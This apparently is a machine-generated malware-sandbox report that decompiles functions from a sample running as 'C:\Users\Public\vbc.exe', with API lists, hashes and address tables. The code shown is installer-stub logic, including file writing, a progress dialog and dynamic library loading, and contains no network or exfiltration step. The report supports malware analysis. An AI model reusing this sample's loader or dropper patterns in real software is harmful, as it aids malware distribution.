                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Char$Next$Prev
                          • String ID: "C:\Users\Public\vbc.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                          • API String ID: 589700163-1374994687
                          • Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                          • Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
                          • Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
                          • Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403E9E Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                          0x00403eb0
                          0x00403f44
                          0x00000000
                          0x00403f44
                          0x00403ec1
                          0x00403ec5
                          0x00000000
                          0x00000000
                          0x00403ecb
                          0x00403ed4
                          0x00403ed7
                          0x00403ed7
                          0x00403edd
                          0x00403ee3
                          0x00403ee3
                          0x00403eef
                          0x00403ef5
                          0x00403efc
                          0x00403eff
                          0x00403f02
                          0x00403f04
                          0x00403f04
                          0x00403f0c
                          0x00403f12
                          0x00403f12
                          0x00403f1c
                          0x00403f21
                          0x00403f24
                          0x00403f29
                          0x00403f2c
                          0x00403f2c
                          0x00403f3c
                          0x00403f3c
                          0x00000000

                          APIs
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                          • String ID:
                          • API String ID: 2320649405-0
                          • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                          • Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
                          • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                          • Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 0040266E Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                          Download Yara Rule
                          C-Code - Quality: 93%
                          			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004055E5(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E0040573D(_t52);
				_t27 = E0040575C(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4; // 0x7e00
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031DA(_t47);
						E004031A8(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                          0x0040266e
                          0x00402670
                          0x0040267c
                          0x0040267f
                          0x00402689
                          0x0040268d
                          0x0040268d
                          0x00402693
                          0x004026a0
                          0x004026a8
                          0x004026ab
                          0x004026b1
                          0x004026bf
                          0x004026c4
                          0x004026c8
                          0x004026cb
                          0x004026d4
                          0x004026e0
                          0x004026e4
                          0x004026e7
                          0x004026f1
                          0x00402710
                          0x004026f8
                          0x004026fd
                          0x00402705
                          0x00402708
                          0x0040270d
                          0x0040270d
                          0x00402717
                          0x00402717
                          0x00402729
                          0x00402730
                          0x00402742
                          0x00402742
                          0x00402748
                          0x00402748
                          0x00402753
                          0x00402754
                          0x00402758
                          0x0040275c
                          0x00402762
                          0x00402762
                          0x00402769
                          0x00402156
                          0x00402880
                          0x0040288c

                          APIs
                          • GlobalAlloc.KERNEL32(00000040,00007E00,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                          • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                          • GlobalFree.KERNEL32(?), ref: 00402717
                          • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66), ref: 00402729
                          • GlobalFree.KERNEL32(00000000), ref: 00402730
                          • CloseHandle.KERNEL32(FFFFFD66), ref: 00402748
                          • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                          • String ID:
                          • API String ID: 3294113728-0
                          • Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                          • Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
                          • Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
                          • Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404E23 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00404E23(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
					}
					_t26 = lstrlenA(0x41fc70);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc70;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc70)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc70, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                          0x00404e29
                          0x00404e35
                          0x00404e38
                          0x00404e3e
                          0x00404e4a
                          0x00404e4d
                          0x00404e50
                          0x00404e56
                          0x00404e56
                          0x00404e5c
                          0x00404e64
                          0x00404e67
                          0x00404e84
                          0x00404e88
                          0x00404e91
                          0x00404e91
                          0x00404e9b
                          0x00404ea4
                          0x00404eb0
                          0x00404eb7
                          0x00404ebb
                          0x00404ebe
                          0x00404ed1
                          0x00404edf
                          0x00404edf
                          0x00404ee3
                          0x00404ee5
                          0x00404ee8
                          0x00000000
                          0x00404ee8
                          0x00404e69
                          0x00404e71
                          0x00404e79
                          0x00404e7f
                          0x00000000
                          0x00404e7f
                          0x00404e79
                          0x00404e67
                          0x00404ef2

                          APIs
                          • lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                          • lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                          • lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                          • SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                          • SendMessageA.USER32 ref: 00404EB7
                          • SendMessageA.USER32 ref: 00404ED1
                          • SendMessageA.USER32 ref: 00404EDF
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend$lstrlen$TextWindowlstrcat
                          • String ID:
                          • API String ID: 2531174081-0
                          • Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                          • Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
                          • Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
                          • Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 004046F2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                          0x00404700
                          0x0040470d
                          0x00404713
                          0x00404751
                          0x00404751
                          0x00404760
                          0x00404767
                          0x00000000
                          0x00404769
                          0x00404715
                          0x00404724
                          0x0040472c
                          0x0040472f
                          0x00404741
                          0x00404747
                          0x0040474e
                          0x00000000
                          0x0040474e
                          0x00000000

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Message$Send$ClientScreen
                          • String ID: f
                          • API String ID: 41195575-1993550816
                          • Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                          • Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
                          • Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
                          • Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402B2D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BA9();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                          0x00402b3a
                          0x00402b48
                          0x00402b4e
                          0x00402b4e
                          0x00402b5c
                          0x00402b5e
                          0x00402b6a
                          0x00402b6f
                          0x00402b71
                          0x00402b71
                          0x00402b7c
                          0x00402b8c
                          0x00402b9e
                          0x00402b9e
                          0x00402ba6

                          APIs
                          • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
                          • wsprintfA.USER32 ref: 00402B7C
                          • SetWindowTextA.USER32(?,?), ref: 00402B8C
                          • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402B9E
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: Text$ItemTimerWindowwsprintf
                          • String ID: unpacking data: %d%%$verifying installer: %d%%
                          • API String ID: 1451636040-1158693248
                          • Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                          • Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
                          • Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
                          • Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00401F51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69libraryloaderCOMMON
                          Download Yara Rule
                          C-Code - Quality: 56%
                          			E00401F51(void* __ebx, void* __eflags) {
				void* _t26;
				struct HINSTANCE__* _t29;
				CHAR* _t31;
				intOrPtr* _t32;
				void* _t33;

				_t26 = __ebx;
				asm("sbb eax, 0x423f58");
				 *(_t33 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L14:
					E00401423();
					L15:
					 *0x423f28 =  *0x423f28 +  *(_t33 - 4);
					return 0;
				}
				_t31 = E004029E8(0xfffffff0);
				 *(_t33 + 8) = E004029E8(1);
				if( *((intOrPtr*)(_t33 - 0x14)) == __ebx) {
					L3:
					_t29 = LoadLibraryExA(_t31, _t26, 8);
					if(_t29 == _t26) {
						_push(0xfffffff6);
						goto L14;
					}
					L4:
					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
					if(_t32 == _t26) {
						E00404E23(0xfffffff7,  *(_t33 + 8));
					} else {
						 *(_t33 - 4) = _t26;
						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x424000, 0x40af68, " ?B");
						} else {
							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
							if( *_t32() != 0) {
								 *(_t33 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
						FreeLibrary(_t29);
					}
					goto L15;
				}
				_t29 = GetModuleHandleA(_t31);
				if(_t29 != __ebx) {
					goto L4;
				}
				goto L3;
			}








                          0x00401f51
                          0x00401f51
                          0x00401f56
                          0x00401f5d
                          0x0040200b
                          0x00402156
                          0x00402156
                          0x0040287d
                          0x00402880
                          0x0040288c
                          0x0040288c
                          0x00401f6c
                          0x00401f76
                          0x00401f79
                          0x00401f88
                          0x00401f92
                          0x00401f96
                          0x00402004
                          0x00000000
                          0x00402004
                          0x00401f98
                          0x00401fa2
                          0x00401fa6
                          0x00401fea
                          0x00401fa8
                          0x00401fab
                          0x00401fae
                          0x00401fde
                          0x00401fb0
                          0x00401fb3
                          0x00401fbc
                          0x00401fbe
                          0x00401fbe
                          0x00401fbc
                          0x00401fae
                          0x00401ff2
                          0x00401ff9
                          0x00401ff9
                          0x00000000
                          0x00401ff2
                          0x00401f82
                          0x00401f86
                          0x00000000
                          0x00000000
                          0x00000000

                          APIs
                          • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 00401F7C
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                            • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                            • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                          • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                          • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 00401F9C
                          • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                          • String ID: ?B
                          • API String ID: 2987980305-117478770
                          • Opcode ID: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                          • Instruction ID: 6286e611532d8822c51d7e946ff34bbadf458e6cc54079b264412ac530ebcb8a
                          • Opcode Fuzzy Hash: 0013dd5c42a12ea961cdb4cd00b6dc1aa0902fbba5a2d5df2c5b14f7f9a972ce
                          • Instruction Fuzzy Hash: 9611E772D04216EBCF107FA4DE89EAE75B0AB44359F20423BF611B62E0C77C8941DA5E
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00402BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON
                          Download Yara Rule
                          C-Code - Quality: 100%
                          			E00402BC5(intOrPtr _a4) {
				char _v68;
				long _t6;
				struct HWND__* _t7;
				struct HWND__* _t14;

				if(_a4 != 0) {
					_t14 =  *0x417044; // 0x0
					if(_t14 != 0) {
						_t14 = DestroyWindow(_t14);
					}
					 *0x417044 = 0;
					return _t14;
				}
				__eflags =  *0x417044; // 0x0
				if(__eflags != 0) {
					return E00405DDC(0);
				}
				_t6 = GetTickCount();
				__eflags = _t6 -  *0x423eac;
				if(_t6 >  *0x423eac) {
					__eflags =  *0x423ea8; // 0x0
					if(__eflags == 0) {
						_t7 = CreateDialogParamA( *0x423ea0, 0x6f, 0, E00402B2D, 0);
						 *0x417044 = _t7;
						return _t7;
					}
					__eflags =  *0x423f54 & 0x00000001;
					if(( *0x423f54 & 0x00000001) != 0) {
						wsprintfA( &_v68, "... %d%%", E00402BA9());
						return E00404E23(0,  &_v68);
					}
				}
				return _t6;
			}







                          0x00402bd1
                          0x00402bd3
                          0x00402bda
                          0x00402bdd
                          0x00402bdd
                          0x00402be3
                          0x00000000
                          0x00402be3
                          0x00402beb
                          0x00402bf1
                          0x00000000
                          0x00402bf4
                          0x00402bfb
                          0x00402c01
                          0x00402c07
                          0x00402c09
                          0x00402c0f
                          0x00402c4d
                          0x00402c53
                          0x00000000
                          0x00402c53
                          0x00402c11
                          0x00402c18
                          0x00402c29
                          0x00000000
                          0x00402c37
                          0x00402c18
                          0x00402c5a

                          APIs
                          • DestroyWindow.USER32 ref: 00402BDD
                          • GetTickCount.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00402DDA), ref: 00402BFB
                          • CreateDialogParamA.USER32(0000006F,00000000,00402B2D,00000000), ref: 00402C4D
                            • Part of subcall function 00402BA9: MulDiv.KERNEL32 ref: 00402BBE
                          • wsprintfA.USER32 ref: 00402C29
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
                            • Part of subcall function 00404E23: lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
                            • Part of subcall function 00404E23: lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
                            • Part of subcall function 00404E23: SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EB7
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404ED1
                            • Part of subcall function 00404E23: SendMessageA.USER32 ref: 00404EDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.465307477.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000004.00000002.465300422.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465317101.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465324475.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465332520.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465357223.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465365833.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000004.00000002.465373563.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                          Similarity
                          • API ID: MessageSend$Windowlstrlen$CountCreateDestroyDialogParamTextTicklstrcatwsprintf
                          • String ID: ... %d%%
